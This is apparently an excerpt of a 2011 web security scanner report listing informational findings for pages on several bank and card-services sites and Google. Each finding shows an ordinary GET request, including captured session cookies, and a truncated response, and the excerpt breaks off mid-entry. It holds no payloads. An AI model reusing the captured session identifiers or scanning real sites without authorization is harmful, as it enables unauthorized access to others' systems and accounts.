Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 31127
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 20:23:00 GMT
Accept-Ranges: bytes
ETag: "0aa87aa16b8cb1:f17"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:33 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...

25.89. http://www.firstnational.com/001/html/en/personal/pers_products_serv/loan_accts/vehicle_loans.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/personal/pers_products_serv/loan_accts/vehicle_loans.html

Request

GET /001/html/en/personal/pers_products_serv/loan_accts/vehicle_loans.html?utm_id=13 HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 26977
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 20:23:10 GMT
Accept-Ranges: bytes
ETag: "08b7db016b8cb1:f17"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:36 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...

25.90. http://www.firstnational.com/001/html/en/personal/personal.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/personal/personal.html

Request

GET /001/html/en/personal/personal.html HTTP/1.1
Host: www.firstnational.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP

Response

HTTP/1.1 200 OK
Content-Length: 32290
Content-Type: text/html
Last-Modified: Wed, 02 Feb 2011 20:57:48 GMT
Accept-Ranges: bytes
ETag: "0aedbd81bc3cb1:d88"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 21:59:46 GMT


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...

25.91. http://www.firstnational.com/001/html/en/personal/product_info.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/personal/product_info.html

Request

GET /001/html/en/personal/product_info.html HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 24470
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 20:09:22 GMT
Accept-Ranges: bytes
ETag: "0c5f6c214b8cb1:d88"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:17:58 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...

25.92. http://www.firstnational.com/001/html/en/personal/resource_center/brochures.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/personal/resource_center/brochures.html

Request

GET /001/html/en/personal/resource_center/brochures.html?utm_id=39 HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 29249
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 20:25:38 GMT
Accept-Ranges: bytes
ETag: "08db4817b8cb1:d88"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:30 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...

25.93. http://www.firstnational.com/001/html/en/personal/resource_center/calculators.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/personal/resource_center/calculators.html

Request

GET /001/html/en/personal/resource_center/calculators.html HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 71326
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 20:25:35 GMT
Accept-Ranges: bytes
ETag: "80c9ea617b8cb1:f17"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:27 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...

25.94. http://www.firstnational.com/001/html/en/personal/resource_center/newsletters/newsletters.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/personal/resource_center/newsletters/newsletters.html

Request

GET /001/html/en/personal/resource_center/newsletters/newsletters.html HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 23480
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 20:24:35 GMT
Accept-Ranges: bytes
ETag: "808327e316b8cb1:f17"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:25 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...

25.95. http://www.firstnational.com/001/html/en/personal/resource_center/resource_center.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/personal/resource_center/resource_center.html

Request

GET /001/html/en/personal/resource_center/resource_center.html HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 24824
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 20:25:44 GMT
Accept-Ranges: bytes
ETag: "01448c17b8cb1:d88"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:23 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...

25.96. http://www.firstnational.com/001/html/en/personal/resource_center/seminars.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/personal/resource_center/seminars.html

Request

GET /001/html/en/personal/resource_center/seminars.html HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 23179
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 20:25:47 GMT
Accept-Ranges: bytes
ETag: "80d711e17b8cb1:f17"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:29 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...

25.97. http://www.firstnational.com/001/html/en/personal/resource_center/tax_center/tax_center.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/personal/resource_center/tax_center/tax_center.html

Request

GET /001/html/en/personal/resource_center/tax_center/tax_center.html HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 24836
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 20:25:17 GMT
Accept-Ranges: bytes
ETag: "803430fc16b8cb1:f17"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:23 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...

25.98. http://www.firstnational.com/001/html/en/sitemap/sitemap.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/sitemap/sitemap.html

Request

GET /001/html/en/sitemap/sitemap.html HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 33946
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 20:29:34 GMT
Accept-Ranges: bytes
ETag: "04b5f9517b8cb1:f17"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:58 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...

25.99. http://www.firstnational.com/001/html/en/small_business/small_business.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/small_business/small_business.html

Request

GET /001/html/en/small_business/small_business.html HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 29782
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 20:29:51 GMT
Accept-Ranges: bytes
ETag: "8049819f17b8cb1:f17"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:57 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...

25.100. http://www.firstnational.com/config/html/en/searchresults.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /config/html/en/searchresults.asp

Request

GET /config/html/en/searchresults.asp HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:19:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 25669
Content-Type: text/html
Cache-control: private


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...

25.101. http://www.firstusa.com/xcards4/common/weblinking/weblinking.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstusa.com
Path:   /xcards4/common/weblinking/weblinking.html

Request

GET /xcards4/common/weblinking/weblinking.html HTTP/1.1
Host: www.firstusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 03 Feb 2011 01:06:46 GMT
Content-length: 5936
Content-type: text/html
Set-Cookie: v1st=49DB682DE70C7979; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.firstusa.com
Last-modified: Thu, 16 Dec 2010 13:58:38 GMT
Etag: "1730-4d0a1b0e"
Accept-ranges: bytes
Connection: close

<html><head><title>Important Information on Weblinking from Chase</title>
<link href="http://www.bankone.com/bolStyle.css" rel="stylesheet" type="text/css">
<SCRIPT Language="javascript" TYPE="text/j
...[SNIP]...

25.102. http://www.google.com/instant/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /instant/

Request

GET /instant/ HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sun, 02 Jan 2011 07:45:29 GMT
Date: Thu, 03 Feb 2011 01:10:29 GMT
Expires: Thu, 03 Feb 2011 01:10:29 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>
Google Instant
</title>
<link href="instant.css" rel="stylesheet">
<meta content="Google Instant" nam
...[SNIP]...

25.103. http://www.google.com/intl/en/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /intl/en/ads/

Request

GET /intl/en/ads/ HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sun, 02 Jan 2011 07:45:29 GMT
Date: Thu, 03 Feb 2011 01:11:10 GMT
Expires: Thu, 03 Feb 2011 01:11:10 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>
Welcome to Google Advertising Programs
</title>
<link href="//www.google.com/css/gcs-v2.css" rel="stylesh
...[SNIP]...

25.104. http://www.google.com/intl/en/options/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /intl/en/options/

Request

GET /intl/en/options/ HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sun, 02 Jan 2011 19:40:45 GMT
Date: Thu, 03 Feb 2011 01:11:05 GMT
Expires: Thu, 03 Feb 2011 01:11:05 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Connection: close

...<!DOCTYPE html>
<html lang="en">
<meta charset="utf-8">
<title>More Google Products</title>
<link rel="stylesheet" href="/options/default.css">

<div id="id">

<h1 id="logo"><a href="/webhp?hl=en">
...[SNIP]...

25.105. http://www.google.com/intl/en_us/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /intl/en_us/ads/

Request

GET /intl/en_us/ads/ HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 01 Feb 2011 22:56:20 GMT
Date: Thu, 03 Feb 2011 01:11:46 GMT
Expires: Thu, 03 Feb 2011 01:11:46 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>
Welcome to Google Advertising Programs
</title>
<link href="css/styles.css" rel="stylesheet">
<script
...[SNIP]...

25.106. http://www.ibsnetaccess.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ibsnetaccess.com
Path:   /

Request

GET / HTTP/1.1
Host: www.ibsnetaccess.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 21:59:58 GMT
Server: IBM_HTTP_Server
Set-Cookie: TLTSID=C697A0BA2F17102F003A8D446414B7D1; Path=/; Domain=.ibsnetaccess.com
Set-Cookie: TLTUID=C697A0BA2F17102F003A8D446414B7D1; Path=/; Domain=.ibsnetaccess.com; Expires=Wed, 02-02-2021 21:59:58 GMT
Last-Modified: Tue, 30 Mar 2010 00:12:24 GMT
ETag: "8e2008-294-7be64a00"
Accept-Ranges: bytes
Content-Length: 660
Content-Type: text/html

<HTML>
<HEAD>
<TITLE>FIA Card Services Net Access</TITLE>
<META NAME = "Keywords" CONTENT = "FIA Card Services, FIA card services, net access, FIA Card Services Net Access, FIA card services
...[SNIP]...

25.107. https://www.ibsnetaccess.com/spotlight/ibsspotlight.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ibsnetaccess.com
Path:   /spotlight/ibsspotlight.html

Request

GET /spotlight/ibsspotlight.html HTTP/1.1
Host: www.ibsnetaccess.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000UNiRaq4SV-vGMcUowkf6zr5:15bs25f24; origin=https://www.ibsnetaccess.com/NASApp/NetAccess/LoginDisplay; TLTUID=C697A0BA2F17102F003A8D446414B7D1; URLNamespace=ibsnetaccess; TLTSID=C697A0BA2F17102F003A8D446414B7D1;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:27 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 30 Mar 2010 00:12:23 GMT
ETag: "7bd801-2b4f-7bd707c0"
Accept-Ranges: bytes
Content-Length: 11087
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...

25.108. http://www.monstersandcritics.com/news/asiapacific/news/article_1614700.php/Greens-slam-Hong-Kong-theme-park-for-importing-endangered-species  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.monstersandcritics.com
Path:   /news/asiapacific/news/article_1614700.php/Greens-slam-Hong-Kong-theme-park-for-importing-endangered-species

Request

GET /news/asiapacific/news/article_1614700.php/Greens-slam-Hong-Kong-theme-park-for-importing-endangered-species HTTP/1.1
Host: www.monstersandcritics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:17:12 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 39221

<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>Greens slam Hong Kon
...[SNIP]...

25.109. https://www.myschedule.navyfederal.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.myschedule.navyfederal.org
Path:   /

Request

GET / HTTP/1.1
Host: www.myschedule.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 15100
Content-Type: text/html
Content-Location: http://www.myschedule.navyfederal.org/Default.htm
Last-Modified: Wed, 07 Nov 2001 15:10:00 GMT
Accept-Ranges: bytes
ETag: "014cf449e67c11:5e8"
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:19:30 GMT
Connection: close
Set-Cookie: TS26bd7b=a65ecccc74731a368fe90c1afa57c1bee8233e9e4dea5aa14d49d874; Path=/

<HTML>
<HEAD><meta scheme='a1afcc517bec909bf5c3fddea7c83c3d' name='TS26bd7b' content='fcdfb7ae7487b17f' /><!--9cc5da25f89a21d1fbb5ffa18da0bb73--><script type="text/javascript">if(window.addEventListe
...[SNIP]...

25.110. https://www.mystreetscape.com/my/charteroneinvest  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mystreetscape.com
Path:   /my/charteroneinvest

Request

GET /my/charteroneinvest HTTP/1.1
Host: www.mystreetscape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: FWS/7.0
Date: Wed, 02 Feb 2011 22:19:32 GMT
P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi"
Set-cookie: MC=ICnV^lPuGcmwLOC9l5HCSfEXjIkSAk1J2HQKA0w6IAAOywABqjMGBAAAAQAGBU1J2HQAP03; path=/; domain=.mystreetscape.com; expires=Thu, 02-Feb-2012 22:19:32 GMT
Set-cookie: spc=311; path=/
Cache-control: public
Set-cookie: HttpOnly
Set-cookie: JSESSIONID=48E9C3976D90BB921D5C93D8E938BE52; path=/; secure
Content-length: 264
Content-type: text/html
Fsreqid: REQ4d49d8740a034c3a20000ecb0000aa33
Fscalleeid: ibweb311
Fselapsedtime: 9719
Connection: close


<html>

<head>


<title>
Charter One Investments
</title>

</head>

<FRAMESET ROWS="100%, *" frameborder=no border=0>
<FRAME NAME="mainframe" onload='javascript:' SRC="/my/charteroneinvest/jsp/
...[SNIP]...

25.111. https://www.mystreetscape.com/my/citizensinvest  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mystreetscape.com
Path:   /my/citizensinvest

Request

GET /my/citizensinvest HTTP/1.1
Host: www.mystreetscape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: FWS/7.0
Date: Wed, 02 Feb 2011 22:19:32 GMT
P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi"
